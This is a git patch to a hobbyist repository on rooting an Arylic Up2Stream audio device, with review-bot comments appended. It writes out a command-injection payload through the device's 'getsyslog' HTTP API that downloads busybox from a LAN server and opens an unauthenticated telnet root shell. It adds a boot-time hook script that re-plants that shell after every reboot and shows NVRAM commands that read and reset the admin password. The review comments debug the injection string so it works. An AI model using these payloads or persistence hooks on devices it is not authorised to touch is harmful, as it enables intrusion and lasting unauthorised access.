From 013e46ca440409d1fdcdf7caaf8de8e37cb7d7ec Mon Sep 17 00:00:00 2001 From: Jan Wachsmuth Date: Tue, 2 Jan 2024 23:51:50 +0100 Subject: [PATCH] updated content --- README.md | 3 ++ TELNETD.md | 13 ++---- boot-process.md | 47 ++++++++++++++++++++ persistant-hook.md | 108 +++++++++++++++++++++++++++++++++++++++++++++ 4 files changed, 162 insertions(+), 9 deletions(-) create mode 100644 persistant-hook.md diff --git a/README.md b/README.md index 813353a..ed79fa3 100644 --- a/README.md +++ b/README.md @@ -29,3 +29,6 @@ Information about the boot process, file systems including environment (NVRAM). ## Downgrade Firmware The first version on my devices was 4.2.8020 from 2020/02/20 (20th of Feb 2020). That version still has some vulnerabilites to be able to get onto the CLI with telnet by pushing a single command to these devices. Although it is good when the vendor is providing upgrades with additional feature and security fixes, I'd still like to be able to "hack" into the CLI. Therefore I had to downgrade the firmware. [Downgrade Firmware](/Downgrade.md) + +## Install Persistant Hook +When the device reboots, any changes in ramfs are lost, however there is a way to install a script or command so that it survives a reboot. [Install Persistant Hook](/persistant-hook.md) \ No newline at end of file diff --git a/TELNETD.md b/TELNETD.md index 1c61e99..b836b0b 100644 --- a/TELNETD.md +++ b/TELNETD.md 
@@ -5,14 +5,15 @@ The command that has this vulnerability is **_"getsyslog"_**, see https://develo The following code snippets are using the IP address 10.1.1.58 for my Arylic Up2Stream device and 10.1.1.22 for a web server running on my local MacMini. ``` -curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash;" +curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+555+/tmp/bin/busybox;ln+-s/tmp/bin/busybox+/tmp/bin/telnetd;/tmp/bin/telnetd+telnetd+-l/bin/ash;" ``` The command above is executing the following commands on the device in addition to the "getsyslog" request: ``` mkdir /tmp/bin wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q; -chmod 777 /tmp/bin/busybox; -/tmp/bin/busybox telnetd -l/bin/ash; +chmod 555 /tmp/bin/busybox; +ln -s /tmp/bin/busybox /tmp/bin/telnetd; +/tmp/bin/telnetd telnetd -l/bin/ash; ``` > **Note:** > Don't forget to add a ";" at the end inside the quotes. Replace all spaces with "+". 
@@ -20,9 +21,3 @@ chmod 777 /tmp/bin/busybox; The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere. A version of busybox is provided here, but there is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need. See section **_Hardware and Firmware_** for more information. On my web server (10.1.1.22) I've created subdirectory ***/a31/bin*** and have copied the busybox binary to that directory - -You may also redirect output and error output for telnetd: -``` -curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;" -``` - diff --git a/boot-process.md b/boot-process.md index 564c266..4d4c621 100644 --- a/boot-process.md +++ b/boot-process.md 
@@ -380,6 +380,53 @@ ApCliChannel=6 # a similar output will provide ralink_init show 2860 ``` +To read a specific variable from NVRAM or modify its value use these commands: +``` +nvram_get 2860 HostName +nvram_get 2860 lan_ipaddr +nvram_get 2860 lan_netmask +# displays password admin and sets a new one +nvram_get 2860 Password +nvram_set Password newpassword +``` +The commands are located here: +``` +cd /bin +ls l +... +-rwxrwxr-x 1 1000 1000 33220 ralink_init +lrwxrwxrwx 1 1000 1000 11 nvram_set -> ralink_init +lrwxrwxrwx 1 1000 1000 11 nvram_get -> ralink_init +-rwxrwxr-x 1 1000 1000 7800 nvram_daemon +... +``` +I found a documentation for these commands: +``` +Usage: +a. get: nvram_get [<2860/rtdev>] +b. set: nvram_set [<2860/rtdev>] +c. init: ralink_init [] [] + +: + rt2860_nvram_show (display rt2860 values in nvram) + rtdev_nvram_show (display rtdev values in nvram) + show (display values in nvram for ) + gen (generate config file from nvram for - does not work) + renew (replace nvram values for with ) + clear (??? clear all entries in nvram for - found in a different documentation) +: + 2860 - rt2860 station or the first Wi-Fi interface + rtdev - intelligent nic or the second Wi-Fi interface (not available for Linkplay A31) +: File name for renew command + +Example: +a. nvram_get 2860 SSID /* get the SSID */ +b. nvram_set 2860 SSID ralink /* set the SSID to ralink */ +c. ralink_init gen 2860 /* generate the RT2860 .dat file from NVRAM */ +d. ralink_init show 2860 /* display the INIC configurations in NVRAM */ +e. ralink_init renew 2860 ra.dat /* set NVRAM values for RT2860 platform according to ra.dat file */ +f. nvram_daemon & /* start the nvram_daemon */ +``` \ No newline at end of file diff --git a/persistant-hook.md b/persistant-hook.md new file mode 100644 index 0000000..e5acded --- /dev/null +++ b/persistant-hook.md 
@@ -0,0 +1,108 @@ +# Install Persistant Hook +When the device reboots, any changes in ramfs are lost, but the device is using flash with squashfs and jffs2 file systems. I have not discovered how to modfiy and upload an image to squashfs, but with jffs2 there is a way to install a hook. + +Below is an output of mount command (including modification of /etc_ro/web/cgi-bin directory, but that's not required to install a hook) and ***cat /proc/mtd*** output: +``` +# mount +rootfs on / type rootfs (rw) +/dev/root on / type squashfs (ro,relatime) +proc on /proc type proc (rw,relatime) +none on /var type ramfs (rw,relatime) +none on /etc type ramfs (rw,relatime) +none on /tmp type ramfs (rw,relatime) +none on /media type ramfs (rw,relatime) +none on /sys type sysfs (rw,relatime) +none on /dev/pts type devpts (rw,relatime,mode=600) +mdev on /dev type ramfs (rw,relatime) +devpts on /dev/pts type devpts (rw,relatime,mode=600) +mdev on /dev type ramfs (rw,relatime) +devpts on /dev/pts type devpts (rw,relatime,mode=600) +/dev/mtdblock8 on /mnt type jffs2 (rw,relatime) +/dev/mtdblock9 on /vendor type jffs2 (rw,relatime) +none on /etc_ro/web/cgi-bin type ramfs (rw,relatime) + +# cat /proc/mtd +dev: size erasesize name +mtd0: 01000000 00010000 "ALL" +mtd1: 00030000 00010000 "Bootloader" +mtd2: 00010000 00010000 "Config" +mtd3: 00010000 00010000 "Factory" +mtd4: 00200000 00010000 "bkKernel" +mtd5: 001df508 00010000 "Kernel" +mtd6: 00950af8 00010000 "RootFS" +mtd7: 00b30000 00010000 "Kernel_RootFS" +mtd8: 00080000 00010000 "user" +mtd9: 00200000 00010000 "user2" +# +``` +The mtd9 device named "user2" is not erased at a reboot, because it contains play lists. It is mounted as /vendor and a hook can be installed in ***/vendor/user*** directory as described below. On the Up2Stream Pro device that I own that directory was already present and a script called ***user.sh*** was located in that directory. 
+ +> **Note:** +> Neither that directory nor the **user.sh*** script were installed on my Up2Stream Amp device by default. Both devices have the same software version 4.2.8020 from 2020/02/20 (20th of Feb 2020) and were downgraded from v4.6.415145, release date 2022/04/27. + +Here's the file from the device where the script was already present (used to start a daemon called ***socket***): +``` +# cat user.sh +#!/bin/sh + +echo "runing custom's app socket.............." +sleep 5 + +chmod 777 /vendor/user/socket + +sn=`ps -ef | grep /vendor/user/socket | grep -v grep |wc -l` +echo $sn + +if [ $sn -eq 0 ]; then + /vendor/user/socket & +fi + +# ######### additional code to install telnetd and more ############# +# get telnetd from full version of busybox and start in background +mkdir /tmp/bin +wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q +chmod 555 /tmp/bin/busybox +ln -s /tmp/bin/busybox /tmp/bin/telnetd +sn=`ps | grep busybox | wc -l` +if [ $sn -eq 1 ]; then + killall busybox +fi +sn=`ps | grep telnetd | wc -l` +if [ $sn -eq 1 ]; then + killall telnetd +fi +/tmp/bin/telnetd telnetd -l/bin/ash & + +# shut down WiFi +ifconfig apcli0 down +ifconfig ra0 down +sleep 60 +ifconfig apcli0 down +echo "WiFi disabled!" + +# Uncomment to disable sleep after 15 minutes +#while true; do sleep 60; echo 'AXX+MUT+000' >/dev/ttyS0; done & +``` +For testing purpose, you may ***reboot*** and ***telnet*** to the device afterwards. 
+ +Here's the file from the device where the script was NOT present: +``` +mkdir /vendor/user +cat <<\EOF > /vendor/user/user.sh +#!/bin/sh +# get telnetd from full version of busybox and start in background +wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q +chmod 777 /tmp/bin/busybox +/tmp/bin/busybox telnetd -l/bin/ash >/tmp/web/busybox.out 2>/tmp/web/busybox.err & +# shut down WiFi +ifconfig ra0 down +ifconfig apcli0 down +# Uncomment to disable sleep after 15 minutes +#while true; do sleep 60; echo 'AXX+MUT+000' >/dev/ttyS0; done & +EOF +chmod 755 /vendor/user/user.sh +cd /vendor/user +ls -l +``` +So far, the device fetches the full version of busybook after each reboot. With ***df*** command you can verify the free space on each of the file systems. +
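Review bot: the README.md hunk spells the new section `Install Persistant Hook` in the heading, the link text and the link target `/persistant-hook.md`, and the new file is created under that misspelled name; the word is "persistent", so rename the file to persistent-hook.md and fix the heading and link in the same commit before other pages start linking to the wrong path. The hunk also leaves README.md without a trailing newline (`\ No newline at end of file`), which will show up as a spurious change in the next edit.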
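Review bot: in the first TELNETD.md hunk (`@@ -5,14`) the URL-encoded command and its expanded listing do not match: the curl line has `ln+-s/tmp/bin/busybox+/tmp/bin/telnetd` with no `+` between `-s` and the source path, while the listing below shows `ln -s /tmp/bin/busybox /tmp/bin/telnetd`. As encoded, the device runs `ln -s/tmp/bin/busybox /tmp/bin/telnetd`; `ln` parses `-s/tmp/...` as a bundle of option letters, rejects `/`, and never creates the symlink, so the final `/tmp/bin/telnetd telnetd -l/bin/ash` fails because the path does not exist. Change it to `ln+-s+/tmp/bin/busybox+/tmp/bin/telnetd`. A second point on the same line: once the link is named `telnetd`, busybox picks the applet from argv[0], so the extra `telnetd` word after the path is only handed to the applet as a stray positional argument and is at best ignored; `/tmp/bin/telnetd -l/bin/ash` is the intended invocation (the `-l/bin/ash` spelling itself is fine, `-l` takes an argument). The `chmod 777` to `chmod 555` change is the right direction.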
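Review bot: the second TELNETD.md hunk (`@@ -20,9`) deletes the only example of redirecting telnetd's output (`>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err`), yet the new persistant-hook.md script for the Amp device relies on exactly that construct (`>/tmp/web/busybox.out 2>/tmp/web/busybox.err &`) without explaining what `/tmp/web` is or why the redirect is needed. Dropping the variant is understandable since it still used `chmod 777` and the direct busybox call that the hunk above replaced, but either keep a one-line mention of the redirect in TELNETD.md in the new `chmod 555`/symlink form, or document it where it is now used. The surviving context line `have copied the busybox binary to that directory` is also missing its full stop.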
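Review bot: in the boot-process.md hunk, `nvram_set Password newpassword` is missing the platform argument that the usage text added a few lines later requires (`nvram_set [<2860/rtdev>] ...`) and that the matching `nvram_get 2860 Password` and the example `nvram_set 2860 SSID ralink` both supply; as written the tool would take `Password` as the platform name. It should read `nvram_set 2860 Password newpassword`. The comment `# displays password admin and sets a new one` should also say which service this `Password` entry belongs to, otherwise a reader changes a credential without knowing what it unlocks. Smaller points: `ls l` should be `ls -l`; in the quoted usage block the placeholder names have been lost (`ralink_init [] []` and the three parameter headings that are now just `:`), so if the committed file really contains empty brackets, restore the `<command>`/`<platform>`/`<file>`-style names, escaped if the renderer eats angle brackets; and the file ends without a trailing newline.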
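Review bot: in persistant-hook.md the script for the device where user.sh was absent (`cat <<\EOF > /vendor/user/user.sh`) runs `wget -O /tmp/bin/busybox ...` without first creating `/tmp/bin`; the page itself states that `/tmp` is ramfs and is lost at reboot, so at boot the directory does not exist, wget fails and no telnetd ever starts. Add `mkdir -p /tmp/bin` as the Pro script does, and bring the rest in line with this patch's TELNETD.md change (`chmod 555` plus the `/tmp/bin/telnetd` symlink instead of `chmod 777` and invoking busybox directly). In the Pro script the restart checks are inverted: `sn=\`ps | grep busybox | wc -l\`` counts the grep process itself, whose own command line contains `busybox`, so the count is 1 when nothing is running and 2 when an old instance is, and `if [ $sn -eq 1 ]; then killall busybox` fires in exactly the wrong case; the `socket` check a few lines above gets this right with `grep -v grep`, so reuse that pattern for both the `busybox` and the `telnetd` check. The hook also brings `ra0` and `apcli0` down right after fetching busybox over the network without saying how the telnet session is reached afterwards; state the assumption (wired LAN?) or a reader on a WiFi-only setup locks themselves out until the next reboot. Two documentation points: the sentence that `user2` "is not erased at a reboot, because it contains play lists" has the cause backwards, it persists because it is a flash partition (`mtd9`) mounted as jffs2 on `/vendor`, whatever it holds; and given that partition's size (`00200000` in `/proc/mtd`), the closing remark about fetching busybox after every reboot would be better followed by the obvious fix of storing the binary under `/vendor/user` once, after checking free space with `df` as the text already suggests. Typos to fix: `Persistant`, `modfiy`, `runing custom's app`, `busybook`.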